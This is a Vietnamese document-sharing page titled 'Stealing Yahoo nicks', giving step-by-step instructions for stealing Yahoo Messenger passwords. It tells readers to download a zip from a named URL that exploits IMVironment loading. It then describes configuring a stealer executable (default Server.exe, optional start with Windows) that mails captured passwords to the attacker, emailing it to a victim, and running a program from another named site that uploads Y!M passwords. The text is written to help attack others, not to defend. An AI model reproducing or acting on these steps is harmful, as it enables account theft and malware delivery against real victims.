Trộm nick Yahoo

Chia sẻ: Nguyễn Kim Lượng | Ngày: | Loại File: DOC | Số trang:2

0
304
lượt xem
98
download

Trộm nick Yahoo

Mô tả tài liệu
  Download Vui lòng tải xuống để xem tài liệu đầy đủ

Cơ bản nó lấy pass bằng cách thực hiện việc load phần IMVironment rất là nguy hiểm ở phần này (từ đó tới này tôi cũng chưa để ý phần này nữa nhưng vô tình nên hôm nay tôi mới sợ nó đấy) nếu các bạn không biết là nó nguy hiểm vô cùng. nhưng hôm nay tôi sẽ hướng dẫn mọi người cách lấy pass bằng phương pháp mới này. cái này tui mới lụm ở đâu đó rất hay.

Chủ đề:
Lưu

Nội dung Text: Trộm nick Yahoo

  1. Để thực hiện được chuyện này các bạn dựa vào lỗi ở yahoo messenger đó nha để lấy paas, cơ bản nó lấy pass bằng cách thực hiện việc load phần IMVironment rất là nguy hiểm ở phần này (từ đó tới này tôi cũng chưa để ý phần này nữa nhưng vô tình nên hôm nay tôi mới sợ nó đấy) nếu các bạn không biết là nó nguy hiểm vô cùng. nhưng hôm nay tôi sẽ hướng dẫn mọi người cách lấy pass bằng phương pháp mới này. cái này tui mới lụm ở đâu đó rất hay. bây giờ tui hướng dẫn cho mọi người ok! Nhưng trước hết vui lòng tủm cái này về nha! vào đây lấy:http://www.ubabble.com/ymsgr.zipHướng dẫn: bước 1: vào yahoo messenger ( chú ý tất cả các phiên bản điều được). Bước 2: Unzip nó ra, tìm cái File ymsgr1.html và nhấp vào đó. Bước 3: nhập nick thằng chó chết vào và chat bình thường chờ load IMVironmet về xong và ta có thể xem pass ở ymsgr2.html khi đó nó sẽ load pass về cho bạn đấy nha! thui tui nói vậy bạn cũng hiểu rùi đấy thui chút bạn thành công 2. Kích hoạt chương trình. Lần lượt điền các thông số cần thiết. - Máy chủ SMTP: có thể là mx1.mail.yahoo.com - Hòm thư của bạn vd: jikibo@yahoo.com ) - Thông tin chú thích: Điền gì cũng được ( vd: nạn nhân là fantomas471@yahoo.com ). - Tên tệp sẽ tạo ra: Tên nào cũng được ( mặc định là Server.exe ). - Kích hoạt cùng Windowns: Có hay không tuỳ thích. Sau khi hoàn tất nhấn vào nút Thử nghiệm để kiểm tra. Nếu ổn thì hãy nhấn vào nút Tạo tệp.
  2. Hãy Attack tệp vừa tạo vào email gửi cho nạn nhân và ngồi chờ kết quả. (IMG:http://naskita.web1000.com/home/sender.gif) download 4. Bà con vào site: http://www.vinacompany.com trong đó có chương trình Funny.exe mọi người down xuống rồi chạy nó để cài đặt. Lần khởi động sau đó của máy chương trình sẽ được kích hoạt --> mật khẩu Y!M sẽ tự động được send lên site này`
Đồng bộ tài khoản